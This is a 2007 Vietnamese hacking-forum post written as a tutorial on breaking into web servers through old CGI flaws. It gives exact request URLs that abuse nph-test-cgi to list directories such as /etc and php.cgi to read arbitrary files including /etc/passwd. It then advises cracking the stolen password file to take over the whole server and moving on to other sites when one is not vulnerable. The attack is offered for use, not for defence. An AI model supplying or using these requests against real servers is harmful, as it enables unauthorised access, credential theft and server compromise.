| [Question] Bài cũ: Hack web qua lỗi exploit cgi. TG:klarken |
09/01/2007 00:00:17 (+0700) | #1 | 35046 |
komodo01
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 08/01/2007 07:01:49
Messages: 24
Offline
|
|
Ta sẽ nhìn qua vài lỗi cgi exploits có thể cho ta access thành công cho 1 web site or server. Đầu tiên là nph-test-cgi exploit.
Lỗi bảo mật này dùng để display information về 1 web site/server .
Cách khai thác:
1) Gõ url lên web browser.
2) Cho thêm cái này vào phía sau: /cgi-bin/nph-test-cgi
Address trông như thế này:
http://www.servername.com/cgi-bin/nph-test-cgi
3)Xem thông báo
4) Dùng kiến thức của bạn về web site khai thác tiếp. Nếu bạn nhận được 1 error message of some sort sau đó là "sorry..", site này không dính lỗi,đi tìm cái khác.
5) Bây giờ ta có thể exploit this server và xem chính xác cái gì ở từng directory on the system!
Làm điều này như sau: type lên url :
CODE/cgi-bin/nph-test-cgi?<directory>/*
6) Vì vậy muốn xem cái gì ở 'etc' directory (Nơi chứa password file ) bạn phải đánh:
CODEhttp://www.servername.com/cgi-bin/nph-test-cgi?/etc/*
7) Nếu bạn muốn xem root directory đánh:
CODEhttp://www.servername.com/cgi-bin/nph-test-cgi?/*
Sang exploit tiếp:
expoit này cho phép bạn "view any file on the server!"
Làm như sau:
1) Type lên web browser.
2) Cho thêm cái gia vị này
CODE/cgi-bin/php.cgi?<a filename>
3) Ví dụ lấy password của www.servername.com type như sau:
http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
4)Bạn sẽ thấy 1 password dài không phải shadowed .Tìm cracker để crack nó và access đếnwhole server.
Thân.
Clarken.
Kết thúc tut 3.
|
|
|
 |
|
|
|
|
| Users currently in here |
|
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận thâm nhập
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")